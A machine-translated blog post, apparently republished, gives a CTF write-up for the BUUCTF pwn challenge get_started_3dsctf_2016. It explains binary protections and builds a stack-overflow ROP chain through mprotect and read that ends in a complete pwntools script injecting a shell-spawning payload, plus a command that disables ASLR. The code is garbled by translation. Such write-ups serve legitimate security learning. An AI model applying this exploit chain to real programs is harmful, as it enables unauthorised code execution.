Shulou(Shulou.com)06/01 Report--

This article mainly explains "how to use the mprotec function to modify the permission to write shellcode", the article explains the content is simple and clear, easy to learn and understand, the following please follow the editor's ideas slowly in-depth, together to study and learn "how to use the mprotec function to modify the authority of memory to write shellcode" bar!

Modify the permission to use the mprotec function to modify the memory to be readable, writable and executable, and then write your own shellcode in the memory, and execute the code: int mprotect (void * addr, size_t len, int prot); addr memory start address len modify the length of the memory prot memory permission

Buuctf title get_started_3dsctf_2016 is used here.

A very simple stack overflow

NX is enabled

By the way, introduce all kinds of protection.

1. ASLR

ASLR is a functional option of the operating system, which acts on the executable (ELF) loading memory runtime, so it can only randomize the base addresses of stack, heap, and libraries. After opening, the stack, libarys, heap and other addresses of each loading program will be randomized.

Not turned on: no effect

Half on: randomize stack and libarys

Full on: randomize stack, libarys, and heap

II. NX

No-Execute (non-executable), the principle of Nx is to identify the memory page where the data is located as unexecutable. When the program execution flow is hijacked to the stack, the program will try to execute instructions on the data page, because the data page is marked as unknowable, and CPU will throw an exception instead of executing the data on the stack.

How it works:

Under Windows, a similar concept is DEP (data execution protection), and the DEP compilation option is turned on by default in the latest version of Visual Studio.

NX disabled: the stack can be executed, and the data on the stack can be executed as code.

NX enabled: the stack is not executable, the data program on the stack is only thought of as data, and an error will occur if it is executed. That is, the data on the stack cannot be executed as code.

III. PIE

PIE (Position Independent Executables) is the compiler (gcc,..) functional option (- fPIE /-fpie), which acts on the compilation process and can be understood as a special PIC (so dedicated, Position Independent Code). The ELF compiled with the PIE option will be shown to be so with the file command, which randomizes the base address of ELF loading memory (common base address of code snippet, plt, got, data, etc.). The effect is that the address disassembled with objdump and IDA is represented by offset rather than absolute address.

No PIE: no effect

PIE enabled: the common base address of code snippet, plt, got, data, etc., will be randomized. In a compiled program, only the offset of instructions, data, etc., is retained, not in the form of an absolute address.

In general, NX (called DEP on Windows platforms) and address space distribution randomization (ASLR) work at the same time.

Memory address randomization mechanism (address space layout randomization), there are three cases

0-turns off process address space randomization. 1-means to randomize the base address of mmap, stack and vdso pages. 2-means to increase the randomization of the heap on the basis of 1.

It can prevent attacks against DEP based on Ret2libc mode. ASLR is used in conjunction with DEP to effectively prevent attackers from running malicious code on the stack.

Built as PIE: a location-independent executable region (position-independent executables). This makes it much more difficult to use a return-oriented programming (return-oriented programming) approach when exploiting buffer overflows and other memory corruption defects in mobile operating systems.

The command to shut down PIE under liunx is as follows:

Sudo-s echo 0 > / proc/sys/kernel/randomize_va_ space IV, Canary

Canary protection. When this protection is enabled, the cookie information will be inserted into the stack when the function starts execution. When the function actually returns, it will verify whether the cookie information is legal, and stop the program if it is illegal. The real cookie information is also stored somewhere in the program. The cookie inserted into the stack is usually stored in a memory unit on top of ebp / rbp.

No Canary protection: no effect

Partial function Canary protection: add cookie before some vulnerable functions return addresses. When the function returns, check whether the cookie is consistent with the cookie inserted by the original program at that location, and if so, the program thinks that it has not been attacked by stack overflow.

Canary protection for all functions: all custom functions add cookie before returning the address. When the function returns, check whether the cookie is consistent with the cookie inserted by the original program at that location, and if the same, the program thinks that there is no stack overflow attack.

5. RELRO

Set the symbol relocation table to read-only or parse and bind all dynamic symbols when the program starts, thereby reducing attacks on GOT.

No RELRO: there is no protection for relocation in this mode.

Partial RELRO: in this mode, some segments (including .dynamic) will be identified as read-only after initialization.

Full RELRO: in this mode, except for partial protection. Lazy parsing is disabled (all import symbols will be parsed at the beginning, and the. got.plt segment will be fully initialized to the final address of the target function and marked as read-only). In addition, since lazy parsing is disabled, the GOT [1] and GOT [2] entries will not be initialized to the mentioned values.

There is a backdoor function, but I can't get through remotely.

From pwn import * context.log_level = 'debug'elf = ELF ('. / get_started_3dsctf_2016') sh = elf.process () printf_addr = 0x0804F0E0main = 0x08048A20get_flag = 0x080489B8payload_01 ='A' * 56 + p32 (get_flag) sh.sendline (payload_01) sh.interactive ()

I can't get through remotely, but the mprotec function has been found, so you can choose to modify the memory permission to write to shellcode through the mprotec function.

Next breakpoint, run

Check the memory.

0x80ea000-0x80ec000 is rw-p permission and can be written. The gdb command extends:

Https://visualgdb.com/gdbreference/commands/x

Originally it overflowed to the get_flag address, but now the stack overflows the ret to the mprotect function address.

Payload = 'A'*0x38 + p32 (mprotect_addr)

Call instruction, call = push + jmp

So leave a return address after the direct ret, because ret is equivalent to jmp to mprotect. In order to complete the return, press a return address after the mprotect address.

Stack parameters are used in 32 for the system. The first parameter is push, and the second parameter is push.....

Payload + = p32 (ret_addr) + p32 (argu1) + p32 (argu2) + p32 (argu3)

Ret_addr is the address after the execution of the mprotect function.

Argu1 is the first parameter of the mprotect function (the address of the modified memory) is set to 0x0x80EB000 (obtained by vmmap)

Argu2 is set to 0x1000 (0x0x80EB000-0x80ec000) as the second parameter of the mprotect function (the size of the memory being modified).

Argu3 is set to 7 = 4 + 2 + 1 (rwx) as the third parameter of the mprotect function (permissions of the modified memory).

In order to use ret later, let's construct the stack layout, because the mprotect function takes three parameters, look for instructions that have three consecutive pop. Normally, function parameters are passed using push, so for stack restore, the function call ends with pop to keep the stack intact, so you need three pop

Use ROPgadget to find the right address

ROPgadget--binary get_started_3dsctf_2016-- only 'pop | ret' | grep pop

0x0804f460 is the address of the above ret_addr

Today's payload can be:

Payload = 'A'*0x38 + p32 (mprotect_addr) + p32 (pop3_addr) + p32 (mem_addr) + p32 (mem_size) + p32 (mem_proc)

After defining the return address of the mprotect function, that is, the address of the read, we can once again use ret to control the eip, write our own shellcode to memory and then execute it, and use the read function to write.

Read function: ssize_t read (int fd, void * buf, size_t count); when fd is set to 0, it can be read from the input, set to 0buf, set to the memory address we want to execute, set to the appropriate size of the memory address we have found, 0x80EB000size, and set it to 0x100.

Payload + = p32 (read_addr) + p32 (ret_addr2) + p32 (0x0) + p32 (mem_addr) + p32 (0x100)

The read function is the same as mprotect, call = push + jmp.

Read_addr is followed by the return address after executing the read function. Once again, use pop3_ret to pop out three used parameters, and then you can use ret to control eip to jump to mem_addr, that is, modify the address of memory to execute your own shellcode, as shown below:

Payload ='A' * 0x38 + p32 (mprotect_addr) + p32 (pop3_addr) + p32 (mem_addr) + p32 (mem_size) + p32 (mem_proc) + p32 (read_addr) + p32 (ret_addr2) + p32 (0x0) + p32 (mem_addr) + p32 (0x100) + p32 (mem_addr)

You can enter shellcode when you execute the read function

# _ * _ coding:utf-8 _ * _ from pwn import * elf = ELF ('. / get_started_3dsctf_2016') sh = elf.process () sh = remote ('node3.buuoj.cn', 28624) pop3_addr = 0x804951Dmem_addr = 0x80EB000 # Readable and writable memory But not executable mem_size = 0x1000 # the debugged value mem_proc = 0x7 # can represent readable and executable mprotect_addr = elf.symbols ['mprotect'] read_addr = elf.symbols [' read'] payload = 'A'*0x38 + p32 (mprotect_addr) + p32 (pop3_addr) + p32 (mem_addr) + p32 (mem_size) + p32 (mem_proc) + p32 (read_addr) + p32 (pop3_addr) + p32 ( 0x0) + p32 (mem_addr) + p32 (0x100) + p32 (mem_addr) sh.sendline (payload) payload_sh = asm (shellcraft.sh () Arch = 'i386, os =' linux') sh.sendline (payload_sh) sh.interactive ()

Thank you for your reading, the above is the content of "how to use the permission of mprotec function to modify memory to write shellcode". After the study of this article, I believe you have a deeper understanding of how to use the permission of mprotec function to modify memory to write shellcode, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.